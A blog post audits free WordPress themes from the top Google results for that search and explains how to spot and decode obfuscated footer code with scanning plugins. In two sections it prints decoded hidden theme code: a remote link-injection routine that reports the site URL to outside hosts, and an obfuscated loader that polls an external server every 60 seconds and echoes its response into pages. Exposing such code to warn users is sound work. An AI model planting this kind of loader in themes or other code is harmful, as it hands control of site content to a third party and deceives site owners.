Why You Should Never Search For Free WordPress Themes

Now, armed only with the words “free WordPress themes,” builtBackwards’ Theme Authenticity Checker Plugin and Donncha O Caoimh’s Exploit Scanner, I’m going to take a look through the first page of Google to see just how safe pages ranking for “Free WordPress Themes” are.

Note: I am not uploading any of these themes onto my server. Instead I have installed xampp and am running WordPress locally on my computer. I don’t advise uploading themes from random websites directly onto your server – you never know what you could catch! There are some nasty diseases out there…..

1. WordPressThemesBase

WordPress Themes Base is in the lucky position of being the top ranking site for “Free WordPress Themes.” Someone’s been working hard on their SEO! The blurb at the bottom tells the visitor that unlike other sites offering free WordPress themes, the themes at WordPress Themes Base are fresh. Great, there’s nothing better than a fresh theme.
I downloaded Prinz Branford Magazine. Already things are looking problematic. Branford Magazine is a theme released by der Prinz. There is a very old version of the theme which (as far as I can tell) isn’t up-to-date with WordPress 3.0 and a Pro was released earlier this year. That means we’re looking at either a theme that doesn’t work properly with WP 3.0 or a theme that is a knock-off of a pro.
First thing’s first – install the theme and run it through TAC.

Encrypted code found! First site on Google and we’ve already come across Base64 :( Poor me….. Base64 is often used to hide malicious code. I can see that the code is in the footer. Let’s take a look at that:


Yeah, copyright me, damned right! But what is that Base64 hiding. Here it is in the footer code:
Lots of blah.
You can decode this base64 code in two ways :

1. You can try Otto’s decoder – handy!
2. You can also do it manually – this involves changing the eval() to an echo() to force whatever’s been hidden out of hiding. This post will walk you through the process.

I’ve gone for option 2. Turning my eval() into an echo() produced this result in my footer:

Eh? A minute ago it said copyright me!!! Bah! Now there’s something about Free Anti-Virus Downloads. Where did that come from? Hidden by the base64 methinks.

The Verdict:

I downloaded another 2 themes from this site and they all contained base64 code. Base 64 does not necessarily just hide links. It can also hide malicious code which can run amok on your site. Not only that but the site, while maintaining that its themes are fresh, is pushing themes built by other designers that the site owner has put base64 code into. I contacted Michael Oeser at der Prinz, who told me that he’s been trying to get in touch with the site about removing the theme but is having no luck. He’s posted a warning on his own blog about the dangers of downloading pirate themes. He’s the designer of Branford Magazine and his advice is to stay well away from sites like this – good advice!

My suggestion:

Avoid!

2. Free WordPress Themes

Another site with free WordPress themes. Great! Just what I need. I’m always after a good freebie. The first theme on the site is called BeautyStore. I like beauty stores so I’ll download that. Get it installed and run it through TAC.

More encrypted code!!!
Here it is in the footer:

For a beauty store it’s not all that beautiful. There are all sorts of encoded functions right in the footer. This time when I turned my eval()s into echo()s I couldn’t get anything to appear. I ran it through a few decoders and it’s far too jumbled up for me :(
Exploit scanner dislikes it as much as I do:


All of these came up as severe warnings.

The Verdict

2nd site on Google and we’re getting more base64. I downloaded a few other themes which contained static links and no base64. I guess that this site is a bit hit and miss. However, with the previous site I could get it decoded and this, no go. A search on some forums for the pieces of code in the footer indicate that it may be encrypted code used for hacking :( I ain’t techie enough to know and I suspect that most WordPress users aren’t either. In that case….

My Suggestion

Avoid!

3. Themes2WP

Scanning through the themes on Themes2WP they’ve certainly got some tempting ones on there. Let’s take a look at Gameliso which looks like a nicely designed magazine theme.
Theme Authenticity Checker says that it has found 5 static links. Static links are okay, right? A developer’s got to link back to their site. Here are the links:

Hmmmmm… I don’t know about you, but I don’t know if singles sites and animal care sites have much to do with theme development. Let’s take a closer look at the code in footer.php:

There are the links, with the helpful message: “Please do not edit following code, it may cause your site to stop working.” What useful information!!!! I would’ve gone and removed the links and broken the whole thing. Phew.
Oh wait… I did remove them and the site still seems to be working.
There’s another link in sidebar.php. Here it is:
Now to check out the styles for ad_lnk:

Wow! That’s a link that’s way out in the middle of nowhere. Can’t be for much except back-linking programmes.
So we’ve checked out the links – let’s run exploit scanner.

Gameliso is picked up as containing an eval () which could be used to execute malicious code. It’s not the type of thing that you want to have showing up in your theme.

The Verdict

Nice themes but contain 5 backlinks to random people who you probably aren’t interested in linking to. It goes so far as to tell you that if you remove the links your theme won’t work. Of course, we know that this isn’t true – but a beginner WordPress user might think twice about removing them. As for the eval function, well it could be harmless but I don’t know enough about javascript (probably like many average WordPress users) to tell you if in this case it is or it isn’t.

My suggestion

Avoid!

4. FreeWPThemes

After assuming that all sites that aren’t WordPress.org are bad, I was surprised to find no odd embedded links in any of the themes that I downloaded from FreeWPThemes. I downloaded 5 themes, from across the site. And they all had the same links:
None of these appear at all out of place. So, I felt a bit bad about my assumptions.
However, I did run the themes against the Theme Check Plugin. The plugin tests your theme to make sure it’s up to the latest theme review standards. Here’s how the Programme theme did:

Lots of errors! There’s even more than that but I couldn’t fit them all into the screenshot.

The Verdict

While the themes from FreeWPThemes might not live up to the exacting standards of the WordPress theme directory, there is nothing malicious about them, nor is there any backlinks. It may be that you come across things that aren’t working in quite the way that you want them to but there’s nothing hidden or evil about them!

My suggestion

Okay to use but check to make sure all of the functionality that you need is working.

5. WordPress.org

Finally! WordPress.org! We all know and love WordPress.org. It is the safest place to go to get your themes. I guess the problem that we all have with the theme repository is that many of the themes look like they were made back in the 1600s (or near enough). This can be frustrating, especially when many of them don’t work too well with WordPress 3.0. At the bottom of this post I’ll list some other safe places that are great for themes.

The Verdict

A totally trusted and safe place to get your free WordPress themes from.

My suggestion

<3

6. Themes.Rock Kitty

This site has a picture of a cat playing a guitar. I am easily pleased by things with cats on them. The first theme that I downloaded had no advertising links or hidden code in it, nor did the second. But the third came up with this:

More Base64!
This time changing my eval()s to echo()s produced this message:
The links at the bottom of the theme appear like this:

Exploit scanner came up with 17 severe warnings for this theme. Since there are only 4 links showing at the bottom I think we can assume that this theme is either packed full of hidden backlinks or there is something else going on.

The Verdict

Use this site very carefully. If you are going to download themes from them install the themes on your local machine and check them out first. This is another site where you could end up downloading a theme that hijacks your site. Be careful!

My suggestion

Avoid!

7. WP Themes Depot

Another website offering the most up-to-date, fresh, beautiful, free WordPress themes. This time I downloaded the most popular theme on the site, Niferiti, downloaded 980 times. Once again I ran it through TAC and came up with encrypted code:

After changing the eval() to an echo() I got this message (again):
Someone obviously doesn’t want me to get rid of the code. The links appear in the footer like so:

It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links. But I guess it’s possible that all spammy links come from the same family…… just maybe….. right?
Update: Okay, so I mustn’t have been paying attention to that message. I = doofus! Once again a lesson in reading things properly. In any case, links, whether family friendly or not, should not be hidden using encrypted code that is often used to mask other activity.

The Verdict

Another site with Base64 in the code. I guess I don’t have to repeat how untrustworthy code like this is. While it’s one thing for a developer to include banklinks it’s another when they use base64 to encode the links. Especially when it’s well known that the code is used to hide malware.

My suggestion

Avoid!

8. WPRex

I downloaded 5 themes from WPRex, the first two contained static spammy links and three others contained (surprise surprise) base64.

That’s Pink Desire. This time to decode it I used this decoder.
Here’s what it spat out:
More encrypted links. People do go to quite some lengths to hide their links!

The Verdict

Another site that is a bit hit and miss. If you must download themes from a place like this make sure you check out what it is you have by using something like TAC. You can also use some of the decoder tools I’ll list at the bottom to check out what any base64 is hiding.

My suggestion

Avoid!

9. No Limits Web Design

While this website has a slightly different name to all of the rest making me hope for something different, upon landing it has the similar announcement about all its great free WordPress themes. I downloaded one of the featured themes – Dark Night – and yet again found more base64 in the theme.

As well as the base64 I found a piece of code starting eval(str_rot13(. You can decode that here.
I got these results:
That’s basically the license. However, when I turned the eval to an echo this code appeared at the top of the page:

function wp_code() { $default_link_text = "Default"; $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php"; $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php"; $l = ""; foreach($link_host as $value) { if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) { while (!feof ($file)) { $line = fgets ($file); $l .= $line; } fclose($file); break; } else { if ($value == end($link_host)) { $l=$default_link_text; } } } return $l; } function check_wp_code_sidebar() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { } else { $l=""; $f = dirname(__file__) . "/sidebar.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); fclose($fd); if (strpos($c, $l) == 0) { die; } } } check_wp_code_sidebar();

I got one of our lovely Incsubbers to take a look at it and he translated it as:

function wp_code() {
  $default_link_text = "Default";
  $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
  $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
  $l = "";
  foreach($link_host as $value) {
   if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
    while (!feof ($file)) {
     $line = fgets ($file);
     $l .= $line;
    }
    fclose($file);
    break;
   } else {
    if ($value == end($link_host)) {
     $l=$default_link_text;
    }
   }
  }
  return $l;
 } 
 function check_wp_code_sidebar() {
  $uri = strtolower($_SERVER["REQUEST_URI"]);
  if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {
  } else {
   $l="";
   $f = dirname(__file__) . "/sidebar.php";
   $fd = fopen($f, "r");
   $c = fread($fd, filesize($f));
   fclose($fd);
   if (strpos($c, $l) == 0) { die; }
  }
 } 
 check_wp_code_sidebar();

The theme is pulling urls into the sidebar, if they don’t appear then die. Poor site :(

Here’s what exploit scanner has to say:

The Verdict

Another site using base64, another one to stay out of the way of. This one is even more encrypted than the others, which ended up showing much more quickly what they are up to.

My suggestion

Avoid!
Phew… getting to the end now… this is exhausting!

10. Templates Browser

Nearly at the end! Actually I did a little search about Templates Browser and found this post. So we can already guess what’s going to happen here. I downloaded the Dropshadow theme, which is actually by Brian Gardner but which you can no longer get from his site (probably because it’s pretty old and not WP 3.0 compatible). Although the TAC only found static links like so:

The static link in the footer is a huge piece of PHP. The source code of the site reveals that it is calling a link to a casino site. However, it has some write elements which make me more suspicious. I got my friendly Incsubber to partially decode it:

1. get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
3. $l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");
4.
5. if (empty($l_time_code)) {
6.         $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
7.         $new_time_code = 0;
8. } else
9.         $new_time_code = intval($l_time_code[0]);
10.
11. if (empty($l_code)) {
12.         $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '
', 'no')");
13.         $new_l_code = '
';
14. } else $new_l_code = $l_code[0];
15.
16. if ( ( time() - $new_time_code ) >= 60 ) {
17.         $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
18.         $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
19.         $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
20.         $xps = "xps.";
21.         $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
22.         $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);
23.
24.         //1.xpstatz.com/xps.php?h=host&u=uri
25.
26.         if (ini_get('allow_url_fopen')) {
27.                 $new_l_code = @file_get_contents("http://" . $url . $page);
28.         }
29.         else {
30.                 $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
31.
32.                 if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
33.                         @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
34.                         @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
35.                         @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
36.                         @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
37.                         $new_l_code = "";
38.                         while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
39.                                 $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
40.                         }
41.                         $new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
42.                 }
43.                 @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
44.         }
45.         if ( strpos($new_l_code, '[/]') ) {
46.                 $new_time_code = time();
47.                 $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
48.                 $wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'");     $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
49. }
50.
51. }
52. if ( strpos($new_l_code, '[/]') ) {
53.         $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
54.         $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
55.         echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
56.         $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
57. }
58. ?>

Doesn’t mean a whole lot to me either….
But it stores the links in wp_options and checks every 60 seconds to grab the code from an external site. Then it updates the timecodes and links in the options table before outputting them in the footer.
Basically a much more complex method of doing everything that we’ve seen already.

The Verdict

Things are already looking suspicious when another site is claiming that Templates Browser contains malware. And even more suspicious when they’re hawking an old theme which has been designed by an established WordPress designer. All of that code in the footer is not good, and is another way of taking control of your site.

My suggestion

Avoid!
Here’s a video from ThemeLab which does what I did, but quicker!

Conclusion

Out of the ten sites on the first page of Google, here are the stats:

• Safe: 1
• Iffy: 1
• Avoid: 8

8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress on the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.

Of course, the WordPress Theme Directory can be frustrating in its lack of themes that work with WordPress 3.0. Many of the themes look a little out of date and lots look very bloggy. Here are some trusted sites where you can find free WordPress themes.

Free Themes

• Theme Shaper
• Theme Hybrid
• Arras Theme
• Smashing Magazine

Premium Sites with some Free WordPress Themes

• Graph Paper Press
• Woo Themes

There are plenty more so look around! Don’t type free WordPress themes into Google though!

Tip: A legitimate site offering free WordPress themes will not have the word “WordPress” in its url. WordPress is trademarked and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes. Here’s what WordPress have to say about it. (thanks to Jim - see comments below – for correcting me on that!!!!)

Decoders

If you are investigating a theme that you think is suspicious you might find the following decoding tools helpful (source):

• $o= Otto’s decoder
• $_F=__FILE__:
• eval(gzinflate(base64_decode('...')));:
• eval(str_rot13(' ... '));
• Other codes
• Manual base64 decode

Useful Plugins

• Theme Authenticity Checker
• Exploit Scanner
• Theme Check

Further Reading

• Chip Bennett analyses the top 30 sites  ranking for WordPress Themes on Google
• Otto on the Anatomy of a Theme Malware
• ThemeLab on why you should stop downloading WordPress Themes from shady sites